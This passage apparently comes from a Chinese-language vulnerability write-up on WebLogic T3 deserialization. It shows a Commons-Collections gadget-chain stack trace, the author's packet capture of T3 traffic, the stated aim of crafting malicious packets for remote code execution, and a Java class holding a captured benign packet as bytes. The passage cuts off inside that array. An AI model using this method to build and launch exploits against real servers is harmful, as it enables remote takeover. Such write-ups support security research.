transform:123, InvokerTransformer (org.apache.commons.collections.functors)
transform:122, ChainedTransformer (org.apache.commons.collections.functors)
get:157, LazyMap (org.apache.commons.collections.map)
invoke:50, AnnotationInvocationHandler (sun.reflect.annotation)
entrySet:-1, $Proxy57
readObject:327, AnnotationInvocationHandler (sun.reflect.annotation)
invoke0:-1, NativeMethodAccessorImpl (sun.reflect)
invoke:39, NativeMethodAccessorImpl (sun.reflect)
invoke:25, DelegatingMethodAccessorImpl (sun.reflect)
invoke:597, Method (java.lang.reflect)
invokeReadObject:974, ObjectStreamClass (java.io)
readSerialData:1848, ObjectInputStream (java.io)
readOrdinaryObject:1752, ObjectInputStream (java.io)
readObject0:1328, ObjectInputStream (java.io)
readObject:350, ObjectInputStream (java.io)
readObject:66, InboundMsgAbbrev (weblogic.rjvm)
read:38, InboundMsgAbbrev (weblogic.rjvm)
readMsgAbbrevs:283, MsgAbbrevJVMConnection (weblogic.rjvm)
init:213, MsgAbbrevInputStream (weblogic.rjvm)
dispatch:498, MsgAbbrevJVMConnection (weblogic.rjvm)
dispatch:330, MuxableSocketT3 (weblogic.rjvm.t3)
dispatch:387, BaseAbstractMuxableSocket (weblogic.socket)
readReadySocketOnce:967, SocketMuxer (weblogic.socket)
readReadySocket:899, SocketMuxer (weblogic.socket)
processSockets:130, PosixSocketMuxer (weblogic.socket)
run:29, SocketReaderRequest (weblogic.socket)
execute:42, SocketReaderRequest (weblogic.socket)
execute:145, ExecuteThread (weblogic.kernel)
run:117, ExecuteThread (weblogic.kernel)

可以看到后半部分是common-collections的反序列化链

weblogic中确实用到了这个东西，现在就需要找反序列化的入口，就需要用到weblogic的T3协议了。

./Oracle/Middleware/user_projects/domains/base_domain/bin/stopWebLogic.sh 这个脚本是用来关闭weblogic服务的，它的脚本中使用了 t3:// 协议。

为了研究这个t3协议到底是个什么东西，我用tcpdump监听，然后运行脚本抓到了t3协议的流量。

tcpdump -i any -w dump.pcap

然后发现在t3协议中，传输了序列化对象，我们知道ac ed 00 05是Java中序列化对象的特点，过滤下

追踪下tcp流

hex转储下，发现确实存在序列化数据。

所以我们可以根据t3协议来构造恶意数据进而利用common-collections的反序列化链达到rce的目的。

接下来就是怎么去构造t3协议数据包？

先来分析下t3协议的数据流，首先是第一个数据包发送了t3 10.3.6nAS:255nHL:19nn，然后服务端回复了一个HELO信息

前人经验：使用t3 9.2.0nAS:255nHL:19nn字符串作为T3的协议头发送给weblogic9、weblogic10g、weblogic11g、weblogic12c均合法。

再来看第二个数据包，将数据流转为C数组

复制第二块红色的，代表是第二个请求包。编写Java代码来分析。

package com.test.index;

import java.util.ArrayList;
import java.util.Base64;
import java.io.InputStream;
import java.io.ByteArrayInputStream;
import java.io.ObjectInputStream;
import java.io.OptionalDataException;
import java.io.StreamCorruptedException;
import java.util.Arrays;
import java.util.List;

public class DecodeObject {
    public static void main(String args[]) throws Exception {

        byte bytes[] = { /* Packet 388 */
                (byte) 0x00, (byte) 0x00, (byte) 0x05, (byte) (byte) 0xba, (byte) 0x01, (byte) 0x65, (byte) 0x01, (byte) 0xff,
                (byte) 0xff, (byte) 0xff, (byte) 0xff, (byte) 0xff, (byte) 0xff, (byte) 0xff, (byte) 0xff, (byte) 0x00,
                (byte) 0x00, (byte) 0x00, (byte) 0x69, (byte) 0x00, (byte) 0x00, (byte) 0xea, (byte) 0x60, (byte) 0x00,
                (byte) 0x00, (byte) 0x00, (byte) 0x18, (byte) 0x05, (byte) 0x08, (byte) 0x4b, (byte) 0xa0, (byte) 0xb4,
                (byte) 0x79, (byte) 0xc0, (byte) 0xd5, (byte) 0x5b, (byte) 0x2a, (byte) 0x27, (byte) 0x86, (byte) 0x3d,
                (byte) 0x71, (byte) 0xf7, (byte) 0x37, (byte) 0xef, (byte) 0xcc, (byte) 0x99, (byte) 0x32, (byte) 0x23,
                (byte) 0x9e, (byte) 0x4b, (byte) 0x75, (byte) 0x02, (byte) 0x79, (byte) 0x73, (byte) 0x72, (byte) 0x00,
                (byte) 0x78, (byte) 0x72, (byte) 0x01, (byte) 0x78, (byte) 0x72, (byte) 0x02, (byte) 0x78, (byte) 0x70,
                (byte) 0x00, (byte) 0x00, (byte) 0x00, (byte) 0x0a, (byte) 0x00, (byte) 0x00, (byte) 0x00, (byte) 0x03,
                (byte) 0x00, (byte) 0x00, (byte) 0x00, (byte) 0x00, (byte) 0x00, (byte) 0x00, (byte) 0x00, (byte) 0x06,
                (byte) 0x00, (byte) 0x70, (byte) 0x70, (byte) 0x70, (byte) 0x70, (byte) 0x70, (byte) 0x70, (byte) 0x00,
                (byte) 0x00, (byte) 0x00, (byte) 0x0a, (byte) 0x00, (byte) 0x00, (byte) 0x00, (byte) 0x03, (byte) 0x00,
                (byte) 0x00, (byte) 0x00, (byte) 0x00, (byte) 0x00, (byte) 0x00, (byte) 0x00, (byte) 0x06, (byte) 0x00,
                (byte) 0x70, (byte) 0x06, (byte) 0xfe, (byte) 0x01, (byte) 0x00, (byte) 0x00, (byte) 0xac, (byte) 0xed,
                (byte) 0x00, (byte) 0x05, (byte) 0x73, (byte) 0x72, (byte) 0x00, (byte) 0x1d, (byte) 0x77, (byte) 0x65,
                (byte) 0x62, (byte) 0x6c, (byte) 0x6f, (byte) 0x67, (byte) 0x69, (byte) 0x63, (byte) 0x2e, (byte) 0x72,
                (byte) 0x6a, (byte) 0x76, (byte) 0x6d, (byte) 0x2e, (byte) 0x43, (byte) 0x6c, (byte) 0x61, (byte) 0x73,
                (byte) 0x73, (byte) 0x54, (byte) 0x61, (byte) 0x62, (byte) 0x6c, (byte) 0x65, (byte) 0x45, (byte) 0x6e,
                (byte) 0x74, (byte) 0x72, (byte) 0x79, (byte) 0x2f, (byte) 0x52, (byte) 0x65, (byte) 0x81, (byte) 0x57,
                (byte) 0xf4, (byte) 0xf9, (byte) 0xed, (byte) 0x0c, (byte) 0x00, (byte) 0x00, (byte) 0x78, (byte) 0x70,
                (byte) 0x72, (byte) 0x00, (byte) 0x24, (byte) 0x77, (byte) 0x65, (byte) 0x62, (byte) 0x6c, (byte) 0x6f,
                (byte) 0x67, (byte) 0x69, (byte) 0x63, (byte) 0x2e, (byte) 0x63, (byte) 0x6f, (byte) 0x6d, (byte) 0x6d,
                (byte) 0x6f, (byte) 0x6e, (byte) 0x2e, (byte) 0x69, (byte) 0x6e, (byte) 0x74, (byte) 0x65, (byte) 0x72,
                (byte) 0x6e, (byte) 0x61, (byte) 0x6c, (byte) 0x2e, (byte) 0x50, (byte) 0x61, (byte) 0x63, (byte) 0x6b,
                (byte) 0x61, (byte) 0x67, (byte) 0x65, (byte) 0x49, (byte) 0x6e, (byte) 0x66, (byte) 0x6f, (byte) 0xe6,
                (byte) 0xf7, (byte) 0x23, (byte) 0xe7, (byte) 0xb8, (byte) 0xae, (byte) 0x1e, (byte) 0xc9, (byte) 0x02,
                (byte) 0x00, (byte) 0x08, (byte) 0x49, (byte) 0x00, (byte) 0x05, (byte) 0x6d, (byte) 0x61, (byte) 0x6a,
                (byte) 0x6f, (byte) 0x72, (byte) 0x49, (byte) 0x00, (byte) 0x05, (byte) 0x6d, (byte) 0x69, (byte) 0x6e,
                (byte) 0x6f, (byte) 0x72, (byte) 0x49, (byte) 0x00, (byte) 0x0c, (byte) 0x72, (byte) 0x6f, (byte) 0x6c,
                (byte) 0x6c, (byte) 0x69, (byte) 0x6e, (byte) 0x67, (byte) 0x50, (byte) 0x61, (byte) 0x74, (byte) 0x63,
                (byte) 0x68, (byte) 0x49, (byte) 0x00, (byte) 0x0b, (byte) 0x73, (byte) 0x65, (byte) 0x72, (byte) 0x76,
                (byte) 0x69, (byte) 0x63, (byte) 0x65, (byte) 0x50, (byte) 0x61, (byte) 0x63, (byte) 0x6b, (byte) 0x5a,
                (byte) 0x00, (byte) 0x0e, (byte) 0x74, (byte) 0x65, (byte) 0x6d, (byte) 0x70, (byte) 0x6f, (byte) 0x72,
                (byte) 0x61, (byte) 0x72, (byte) 0x79, (byte) 0x50, (byte) 0x61, (byte) 0x74, (byte) 0x63, (byte) 0x68,
                (byte) 0x4c, (byte) 0x00, (byte) 0x09, (byte) 0x69, (byte) 0x6d, (byte) 0x70, (byte) 0x6c, (byte) 0x54,
                (byte) 0x69, (byte) 0x74, (byte) 0x6c, (byte) 0x65, (byte) 0x74, (byte) 0x00, (byte) 0x12, (byte) 0x4c,
                (byte) 0x6a, (byte) 0x61, (byte) 0x76, (byte) 0x61, (byte) 0x2f, (byte) 0x6c, (byte) 0x61, (byte) 0x6e,
                (byte) 0x67, (byte) 0x2f, (byte) 0x53, (byte) 0x74, (byte) 0x72, (byte) 0x69, (byte) 0x6e, (byte) 0x67,
                (byte) 0x3b, (byte) 0x4c, (byte) 0x00, (byte) 0x0a, (byte) 0x69, (byte) 0x6d, (byte) 0x70, (byte) 0x6c,
                (byte) 0x56, (byte) 0x65, (byte) 0x6e, (byte) 0x64, (byte) 0x6f, (byte) 0x72, (byte) 0x71, (byte) 0x00,
                (byte) 0x7e, (byte) 0x00, (byte) 0x03, (byte) 0x4c, (byte) 0x00, (byte) 0x0b, (byte) 0x69, (byte) 0x6d,
                (byte) 0x70, (byte) 0x6c, (byte) 0x56, (byte) 0x65, (byte) 0x72, (byte) 0x73, (byte) 0x69, (byte) 0x6f,
                (byte) 0x6e, (byte) 0x71, (byte) 0x00, (byte) 0x7e, (byte) 0x00, (byte) 0x03, (byte) 0x78, (byte) 0x70,
                (byte) 0x77, (byte) 0x02, (byte) 0x00, (byte) 0x00, (byte) 0x78, (byte) 0xfe, (byte) 0x01, (byte) 0x00,
                (byte) 0x00, (byte) 0xac, (byte) 0xed, (byte) 0x00, (byte) 0x05, (byte) 0x73, (byte) 0x72, (byte) 0x00,
                (byte) 0x1d, (byte) 0x77, (byte) 0x65, (byte) 0x62, (byte) 0x6c, (byte) 0x6f, (byte) 0x67, (byte) 0x69,
                (byte) 0x63, (byte) 0x2e, (byte) 0x72, (byte) 0x6a, (byte) 0x76, (byte) 0x6d, (byte) 0x2e, (byte) 0x43,
                (byte) 0x6c, (byte) 0x61, (byte) 0x73, (byte) 0x73, (byte) 0x54, (byte) 0x61, (byte) 0x62, (byte) 0x6c,
                (byte) 0x65, (byte) 0x45, (byte) 0x6e, (byte) 0x74, (byte) 0x72, (byte) 0x79, (byte) 0x2f, (byte) 0x52,
                (byte) 0x65, (byte) 0x81, (byte) 0x57, (byte) 0xf4, (byte) 0xf9, (byte) 0xed, (byte) 0x0c, (byte) 0x00,
                (byte) 0x00, (byte) 0x78, (byte) 0x70, (byte) 0x72, (byte) 0x00, (byte) 0x24, (byte) 0x77, (byte) 0x65,
                (byte) 0x62, (byte) 0x6c, (byte) 0x6f, (byte) 0x67, (byte) 0x69, (byte) 0x63, (byte) 0x2e, (byte) 0x63,
                (byte) 0x6f, (byte) 0x6d, (byte) 0x6d, (byte) 0x6f, (byte) 0x6e, (byte) 0x2e, (byte) 0x69, (byte) 0x6e,
                (byte) 0x74, (byte) 0x65, (byte) 0x72, (byte) 0x6e, (byte) 0x61, (byte) 0x6c, (byte) 0x2e, (byte) 0x56,
                (byte) 0x65, (byte) 0x72, (byte) 0x73, (byte) 0x69, (byte) 0x6f, (byte) 0x6e, (byte) 0x49, (byte) 0x6e,
                (byte) 0x66, (byte) 0x6f, (byte) 0x97, (byte) 0x22, (byte) 0x45, (byte) 0x51, (byte) 0x64, (byte) 0x52,
                (byte) 0x46, (byte) 0x3e, (byte) 0x02, (byte) 0x00, (byte) 0x03, (byte) 0x5b, (byte) 0x00, (byte) 0x08,
                (byte) 0x70, (byte) 0x61, (byte) 0x63, (byte) 0x6b, (byte) 0x61, (byte) 0x67, (byte) 0x65, (byte) 0x73,
                (byte) 0x74, (byte) 0x00, (byte) 0x27, (byte) 0x5b, (byte) 0x4c, (byte) 0x77, (byte) 0x65, (byte) 0x62,
                (byte) 0x6c, (byte) 0x6f, (byte) 0x67, (byte) 0x69, (byte) 0x63, (byte) 0x2f, (byte) 0x63, (byte) 0x6f,
                (byte) 0x6d, (byte) 0x6d, (byte) 0x6f, (byte) 0x6e, (byte) 0x2f, (byte) 0x69, (byte) 0x6e, (byte) 0x74,
                (byte) 0x65, (byte) 0x72, (byte) 0x6e, (byte) 0x61, (byte) 0x6c, (byte) 0x2f, (byte) 0x50, (byte) 0x61,
                (byte) 0x63, (byte) 0x6b, (byte) 0x61, (byte) 0x67, (byte) 0x65, (byte) 0x49, (byte) 0x6e, (byte) 0x66,
                (byte) 0x6f, (byte) 0x3b, (byte) 0x4c, (byte) 0x00, (byte) 0x0e, (byte) 0x72, (byte) 0x65, (byte) 0x6c,
                (byte) 0x65, (byte) 0x61, (byte) 0x73, (byte) 0x65, (byte) 0x56, (byte) 0x65, (byte) 0x72, (byte) 0x73,
                (byte) 0x69, (byte) 0x6f, (byte) 0x6e, (byte) 0x74, (byte) 0x00, (byte) 0x12, (byte) 0x4c, (byte) 0x6a,
                (byte) 0x61, (byte) 0x76, (byte) 0x61, (byte) 0x2f, (byte) 0x6c, (byte) 0x61, (byte) 0x6e, (byte) 0x67,
                (byte) 0x2f, (byte) 0x53, (byte) 0x74, (byte) 0x72, (byte) 0x69, (byte) 0x6e, (byte) 0x67, (byte) 0x3b,
                (byte) 0x5b, (byte) 0x00, (byte) 0x12, (byte) 0x76, (byte) 0x65, (byte) 0x72, (byte) 0x73, (byte) 0x69,
                (byte) 0x6f, (byte) 0x6e, (byte) 0x49, (byte) 0x6e, (byte) 0x66, (byte) 0x6f, (byte) 0x41, (byte) 0x73,
                (byte) 0x42, (byte) 0x79, (byte) 0x74, (byte) 0x65, (byte) 0x73, (byte) 0x74, (byte) 0x00, (byte) 0x02,
                (byte) 0x5b, (byte) 0x42, (byte) 0x78, (byte) 0x72, (byte) 0x00, (byte) 0x24, (byte) 0x77, (byte) 0x65,
                (byte) 0x62, (byte) 0x6c, (byte) 0x6f, (byte) 0x67, (byte) 0x69, (byte) 0x63, (byte) 0x2e, (byte) 0x63,
                (byte) 0x6f, (byte) 0x6d, (byte) 0x6d, (byte) 0x6f, (byte) 0x6e, (byte) 0x2e, (byte) 0x69, (byte) 0x6e,
                (byte) 0x74, (byte) 0x65, (byte) 0x72, (byte) 0x6e, (byte) 0x61, (byte) 0x6c, (byte) 0x2e, (byte) 0x50,
                (byte) 0x61, (byte) 0x63, (byte) 0x6b, (byte) 0x61, (byte) 0x67, (byte) 0x65, (byte) 0x49, (byte) 0x6e,
                (byte) 0x66, (byte) 0x6f, (byte) 0xe6, (byte) 0xf7, (byte) 0x23, (byte) 0xe7, (byte) 0xb8, (byte) 0xae,
                (byte) 0x1e, (byte) 0xc9, (byte) 0x02, (byte) 0x00, (byte) 0x08, (byte) 0x49, (byte) 0x00, (byte) 0x05,
                (byte) 0x6d, (byte) 0x61, (byte) 0x6a, (byte) 0x6f, (byte) 0x72, (byte) 0x49, (byte) 0x00, (byte) 0x05,
                (byte) 0x6d, (byte) 0x69, (byte) 0x6e, (byte) 0x6f, (byte) 0x72, (byte) 0x49, (byte) 0x00, (byte) 0x0c,
                (byte) 0x72, (byte) 0x6f, (byte) 0x6c, (byte) 0x6c, (byte) 0x69, (byte) 0x6e, (byte) 0x67, (byte) 0x50,
                (byte) 0x61, (byte) 0x74, (byte) 0x63, (byte) 0x68, (byte) 0x49, (byte) 0x00, (byte) 0x0b, (byte) 0x73,
                (byte) 0x65, (byte) 0x72, (byte) 0x76, (byte) 0x69, (byte) 0x63, (byte) 0x65, (byte) 0x50, (byte) 0x61,
                (byte) 0x63, (byte) 0x6b, (byte) 0x5a, (byte) 0x00, (byte) 0x0e, (byte) 0x74, (byte) 0x65, (byte) 0x6d,
                (byte) 0x70, (byte) 0x6f, (byte) 0x72, (byte) 0x61, (byte) 0x72, (byte) 0x79, (byte) 0x50, (byte) 0x61,
                (byte) 0x74, (byte) 0x63, (byte) 0x68, (byte) 0x4c, (byte) 0x00, (byte) 0x09, (byte) 0x69, (byte) 0x6d,
                (byte) 0x70, (byte) 0x6c, (byte) 0x54, (byte) 0x69, (byte) 0x74, (byte) 0x6c, (byte) 0x65, (byte) 0x71,
                (byte) 0x00, (byte) 0x7e, (byte) 0x00, (byte) 0x04, (byte) 0x4c, (byte) 0x00, (byte) 0x0a, (byte) 0x69,
                (byte) 0x6d, (byte) 0x70, (byte) 0x6c, (byte) 0x56, (byte) 0x65, (byte) 0x6e, (byte) 0x64, (byte) 0x6f,
                (byte) 0x72, (byte) 0x71, (byte) 0x00, (byte) 0x7e, (byte) 0x00, (byte) 0x04, (byte) 0x4c, (byte) 0x00,
                (byte) 0x0b, (byte) 0x69, (byte) 0x6d, (byte) 0x70, (byte) 0x6c, (byte) 0x56, (byte) 0x65, (byte) 0x72,
                (byte) 0x73, (byte) 0x69, (byte) 0x6f, (byte) 0x6e, (byte) 0x71, (byte) 0x00, (byte) 0x7e, (byte) 0x00,
                (byte) 0x04, (byte) 0x78, (byte) 0x70, (byte) 0x77, (byte) 0x02, (byte) 0x00, (byte) 0x00, (byte) 0x78,
                (byte) 0xfe, (byte) 0x01, (byte) 0x00, (byte) 0x00, (byte) 0xac, (byte) 0xed, (byte) 0x00, (byte) 0x05,
                (byte) 0x73, (byte) 0x72, (byte) 0x00, (byte) 0x1d, (byte) 0x77, (byte) 0x65, (byte) 0x62, (byte) 0x6c,
                (byte) 0x6f, (byte) 0x67, (byte) 0x69, (byte) 0x63, (byte) 0x2e, (byte) 0x72, (byte) 0x6a, (byte) 0x76,
                (byte) 0x6d, (byte) 0x2e, (byte) 0x43, (byte) 0x6c, (byte) 0x61, (byte) 0x73, (byte) 0x73, (byte) 0x54,
                (byte) 0x61, (byte) 0x62, (byte) 0x6c, (byte) 0x65, (byte) 0x45, (byte) 0x6e, (byte) 0x74, (byte) 0x72,
                (byte) 0x79, (byte) 0x2f, (byte) 0x52, (byte) 0x65, (byte) 0x81, (byte) 0x57, (byte) 0xf4, (byte) 0xf9,
                (byte) 0xed, (byte) 0x0c, (byte) 0x00, (byte) 0x00, (byte) 0x78, (byte) 0x70, (byte) 0x72, (byte) 0x00,
                (byte) 0x21, (byte) 0x77, (byte) 0x65, (byte) 0x62, (byte) 0x6c, (byte) 0x6f, (byte) 0x67, (byte) 0x69,
                (byte) 0x63, (byte) 0x2e, (byte) 0x63, (byte) 0x6f, (byte) 0x6d, (byte) 0x6d, (byte) 0x6f, (byte) 0x6e,
                (byte) 0x2e, (byte) 0x69, (byte) 0x6e, (byte) 0x74, (byte) 0x65, (byte) 0x72, (byte) 0x6e, (byte) 0x61,
                (byte) 0x6c, (byte) 0x2e, (byte) 0x50, (byte) 0x65, (byte) 0x65, (byte) 0x72, (byte) 0x49, (byte) 0x6e,
                (byte) 0x66, (byte) 0x6f, (byte) 0x58, (byte) 0x54, (byte) 0x74, (byte) 0xf3, (byte) 0x9b, (byte) 0xc9,
                (byte) 0x08, (byte) 0xf1, (byte) 0x02, (byte) 0x00, (byte) 0x06, (byte) 0x49, (byte) 0x00, (byte) 0x05,
                (byte) 0x6d, (byte) 0x61, (byte) 0x6a, (byte) 0x6f, (byte) 0x72, (byte) 0x49, (byte) 0x00, (byte) 0x05,
                (byte) 0x6d, (byte) 0x69, (byte) 0x6e, (byte) 0x6f, (byte) 0x72, (byte) 0x49, (byte) 0x00, (byte) 0x0c,
                (byte) 0x72, (byte) 0x6f, (byte) 0x6c, (byte) 0x6c, (byte) 0x69, (byte) 0x6e, (byte) 0x67, (byte) 0x50,
                (byte) 0x61, (byte) 0x74, (byte) 0x63, (byte) 0x68, (byte) 0x49, (byte) 0x00, (byte) 0x0b, (byte) 0x73,
                (byte) 0x65, (byte) 0x72, (byte) 0x76, (byte) 0x69, (byte) 0x63, (byte) 0x65, (byte) 0x50, (byte) 0x61,
                (byte) 0x63, (byte) 0x6b, (byte) 0x5a, (byte) 0x00, (byte) 0x0e, (byte) 0x74, (byte) 0x65, (byte) 0x6d,
                (byte) 0x70, (byte) 0x6f, (byte) 0x72, (byte) 0x61, (byte) 0x72, (byte) 0x79, (byte) 0x50, (byte) 0x61,
                (byte) 0x74, (byte) 0x63, (byte) 0x68, (byte) 0x5b, (byte) 0x00, (byte) 0x08, (byte) 0x70, (byte) 0x61,
                (byte) 0x63, (byte) 0x6b, (byte) 0x61, (byte) 0x67, (byte) 0x65, (byte) 0x73, (byte) 0x74, (byte) 0x00,
                (byte) 0x27, (byte) 0x5b, (byte) 0x4c, (byte) 0x77, (byte) 0x65, (byte) 0x62, (byte) 0x6c, (byte) 0x6f,
                (byte) 0x67, (byte) 0x69, (byte) 0x63, (byte) 0x2f, (byte) 0x63, (byte) 0x6f, (byte) 0x6d, (byte) 0x6d,
                (byte) 0x6f, (byte) 0x6e, (byte) 0x2f, (byte) 0x69, (byte) 0x6e, (byte) 0x74, (byte) 0x65, (byte) 0x72,
                (byte) 0x6e, (byte) 0x61, (byte) 0x6c, (byte) 0x2f, (byte) 0x50, (byte) 0x61, (byte) 0x63, (byte) 0x6b,
                (byte) 0x61, (byte) 0x67, (byte) 0x65, (byte) 0x49, (byte) 0x6e, (byte) 0x66, (byte) 0x6f, (byte) 0x3b,
                (byte) 0x78, (byte) 0x72, (byte) 0x00, (byte) 0x24, (byte) 0x77, (byte) 0x65, (byte) 0x62, (byte) 0x6c,
                (byte) 0x6f, (byte) 0x67, (byte) 0x69, (byte) 0x63, (byte) 0x2e, (byte) 0x63, (byte) 0x6f, (byte) 0x6d,
                (byte) 0x6d, (byte) 0x6f, (byte) 0x6e, (byte) 0x2e, (byte) 0x69, (byte) 0x6e, (byte) 0x74, (byte) 0x65,
                (byte) 0x72, (byte) 0x6e, (byte) 0x61, (byte) 0x6c, (byte) 0x2e, (byte) 0x56, (byte) 0x65, (byte) 0x72,
                (byte) 0x73, (byte) 0x69, (byte) 0x6f, (byte) 0x6e, (byte) 0x49, (byte) 0x6e, (byte) 0x66, (byte) 0x6f,
                (byte) 0x97, (byte) 0x22, (byte) 0x45, (byte) 0x51, (byte) 0x64, (byte) 0x52, (byte) 0x46, (byte) 0x3e,
                (byte) 0x02, (byte) 0x00, (byte) 0x03, (byte) 0x5b, (byte) 0x00, (byte) 0x08, (byte) 0x70, (byte) 0x61,
                (byte) 0x63, (byte) 0x6b, (byte) 0x61, (byte) 0x67, (byte) 0x65, (byte) 0x73, (byte) 0x71, (byte) 0x00,
                (byte) 0x7e, (byte) 0x00, (byte) 0x03, (byte) 0x4c, (byte) 0x00, (byte) 0x0e, (byte) 0x72, (byte) 0x65,
                (byte) 0x6c, (byte) 0x65, (byte) 0x61, (byte) 0x73, (byte) 0x65, (byte) 0x56, (byte) 0x65, (byte) 0x72,
                (byte) 0x73, (byte) 0x69, (byte) 0x6f, (byte) 0x6e, (byte) 0x74, (byte) 0x00, (byte) 0x12, (byte) 0x4c,
                (byte) 0x6a, (byte) 0x61, (byte) 0x76, (byte) 0x61, (byte) 0x2f, (byte) 0x6c, (byte) 0x61, (byte) 0x6e,
                (byte) 0x67, (byte) 0x2f, (byte) 0x53, (byte) 0x74, (byte) 0x72, (byte) 0x69, (byte) 0x6e, (byte) 0x67,
                (byte) 0x3b, (byte) 0x5b, (byte) 0x00, (byte) 0x12, (byte) 0x76, (byte) 0x65, (byte) 0x72, (byte) 0x73,
                (byte) 0x69, (byte) 0x6f, (byte) 0x6e, (byte) 0x49, (byte) 0x6e, (byte) 0x66, (byte) 0x6f, (byte) 0x41,
                (byte) 0x73, (byte) 0x42, (byte) 0x79, (byte) 0x74, (byte) 0x65, (byte) 0x73, (byte) 0x74, (byte) 0x00,
                (byte) 0x02, (byte) 0x5b, (byte) 0x42, (byte) 0x78, (byte) 0x72, (byte) 0x00, (byte) 0x24, (byte) 0x77,
                (byte) 0x65, (byte) 0x62, (byte) 0x6c, (byte) 0x6f, (byte) 0x67, (byte) 0x69, (byte) 0x63, (byte) 0x2e,
                (byte) 0x63, (byte) 0x6f, (byte) 0x6d, (byte) 0x6d, (byte) 0x6f, (byte) 0x6e, (byte) 0x2e, (byte) 0x69,
                (byte) 0x6e, (byte) 0x74, (byte) 0x65, (byte) 0x72, (byte) 0x6e, (byte) 0x61, (byte) 0x6c, (byte) 0x2e,
                (byte) 0x50, (byte) 0x61, (byte) 0x63, (byte) 0x6b, (byte) 0x61, (byte) 0x67, (byte) 0x65, (byte) 0x49,
                (byte) 0x6e, (byte) 0x66, (byte) 0x6f, (byte) 0xe6, (byte) 0xf7, (byte) 0x23, (byte) 0xe7, (byte) 0xb8,
                (byte) 0xae, (byte) 0x1e, (byte) 0xc9, (byte) 0x02, (byte) 0x00, (byte) 0x08, (byte) 0x49, (byte) 0x00,
                (byte) 0x05, (byte) 0x6d, (byte) 0x61, (byte) 0x6a, (byte) 0x6f, (byte) 0x72, (byte) 0x49, (byte) 0x00,
                (byte) 0x05, (byte) 0x6d, (byte) 0x69, (byte) 0x6e, (byte) 0x6f, (byte) 0x72, (byte) 0x49, (byte) 0x00,
                (byte) 0x0c, (byte) 0x72, (byte) 0x6f, (byte) 0x6c, (byte) 0x6c, (byte) 0x69, (byte) 0x6e, (byte) 0x67,
                (byte) 0x50, (byte) 0x61, (byte) 0x74, (byte) 0x63, (byte) 0x68, (byte) 0x49, (byte) 0x00, (byte) 0x0b,
                (byte) 0x73, (byte) 0x65, (byte) 0x72, (byte) 0x76, (byte) 0x69, (byte) 0x63, (byte) 0x65, (byte) 0x50,
                (byte) 0x61, (byte) 0x63, (byte) 0x6b, (byte) 0x5a, (byte) 0x00, (byte) 0x0e, (byte) 0x74, (byte) 0x65,
                (byte) 0x6d, (byte) 0x70, (byte) 0x6f, (byte) 0x72, (byte) 0x61, (byte) 0x72, (byte) 0x79, (byte) 0x50,
                (byte) 0x61, (byte) 0x74, (byte) 0x63, (byte) 0x68, (byte) 0x4c, (byte) 0x00, (byte) 0x09, (byte) 0x69,
                (byte) 0x6d, (byte) 0x70, (byte) 0x6c, (byte) 0x54, (byte) 0x69, (byte) 0x74, (byte) 0x6c, (byte) 0x65,
                (byte) 0x71, (byte) 0x00, (byte) 0x7e, (byte) 0x00, (byte) 0x05, (byte) 0x4c, (byte) 0x00, (byte) 0x0a,
                (byte) 0x69, (byte) 0x6d, (byte) 0x70, (byte) 0x6c, (byte) 0x56, (byte) 0x65, (byte) 0x6e, (byte) 0x64,
                (byte) 0x6f, (byte) 0x72, (byte) 0x71, (byte) 0x00, (byte) 0x7e, (byte) 0x00, (byte) 0x05, (byte) 0x4c,
                (byte) 0x00, (byte) 0x0b, (byte) 0x69, (byte) 0x6d, (byte) 0x70, (byte) 0x6c, (byte) 0x56, (byte) 0x65,
                (byte) 0x72, (byte) 0x73, (byte) 0x69, (byte) 0x6f, (byte) 0x6e, (byte) 0x71, (byte) 0x00, (byte) 0x7e,
                (byte) 0x00, (byte) 0x05, (byte) 0x78, (byte) 0x70, (byte) 0x77, (byte) 0x02, (byte) 0x00, (byte) 0x00,
                (byte) 0x78, (byte) 0xfe, (byte) 0x00, (byte) 0xff, (byte) 0xfe, (byte) 0x01, (byte) 0x00, (byte) 0x00,
                (byte) 0xac, (byte) 0xed, (byte) 0x00, (byte) 0x05, (byte) 0x73, (byte) 0x72, (byte) 0x00, (byte) 0x13,
                (byte) 0x77, (byte) 0x65, (byte) 0x62, (byte) 0x6c, (byte) 0x6f, (byte) 0x67, (byte) 0x69, (byte) 0x63,
                (byte) 0x2e, (byte) 0x72, (byte) 0x6a, (byte) 0x76, (byte) 0x6d, (byte) 0x2e, (byte) 0x4a, (byte) 0x56,
                (byte) 0x4d, (byte) 0x49, (byte) 0x44, (byte) 0xdc, (byte) 0x49, (byte) 0xc2, (byte) 0x3e, (byte) 0xde,
                (byte) 0x12, (byte) 0x1e, (byte) 0x2a, (byte) 0x0c, (byte) 0x00, (byte) 0x00, (byte) 0x78, (byte) 0x70,
                (byte) 0x77, (byte) 0x49, (byte) 0x21, (byte) 0x00, (byte) 0x00, (byte) 0x00, (byte) 0x00, (byte) 0x00,
                (byte) 0x00, (byte) 0x00, (byte) 0x00, (byte) 0x00, (byte) 0x0c, (byte) 0x31, (byte) 0x37, (byte) 0x32,
                (byte) 0x2e, (byte) 0x31, (byte) 0x36, (byte) 0x2e, (byte) 0x32, (byte) 0x2e, (byte) 0x31, (byte) 0x32,
                (byte) 0x39, (byte) 0x00, (byte) 0x0c, (byte) 0x31, (byte) 0x37, (byte) 0x32, (byte) 0x2e, (byte) 0x31,
                (byte) 0x36, (byte) 0x2e, (byte) 0x32, (byte) 0x2e, (byte) 0x31, (byte) 0x32, (byte) 0x39, (byte) 0x36,
                (byte) 0x65, (byte) 0x53, (byte) 0x70, (byte) 0x00, (byte) 0x00, (byte) 0x00, (byte) 0x07, (byte) 0x00,
                (byte) 0x00, (byte) 0x1b, (byte) 0x59, (byte) 0xff, (byte) 0xff, (byte) 0xff, (byte) 0xff, (byte) 0xff,
                (byte) 0xff, (byte) 0xff, (byte) 0xff, (byte) 0xff, (byte) 0xff, (byte) 0xff, (byte) 0xff, (byte) 0xff,
                (byte) 0xff, (byte) 0xff, (byte) 0xff, (byte) 0xff, (byte) 0xff, (byte) 0xff, (byte) 0xff, (byte) 0xff,
                (byte) 0xff, (byte) 0xff, (byte) 0xff, (byte) 0x78, (byte) 0xfe, (byte) 0x01, (byte) 0x00, (byte) 0x00,
                (byte) 0xac, (byte) 0xed, (byte) 0x00, (byte) 0x05, (byte) 0x73, (byte) 0x72, (byte) 0x00, (byte) 0x13,
                (byte) 0x77, (byte) 0x65, (byte) 0x62, (byte) 0x6c, (byte) 0x6f, (byte) 0x67, (byte) 0x69, (byte) 0x63,
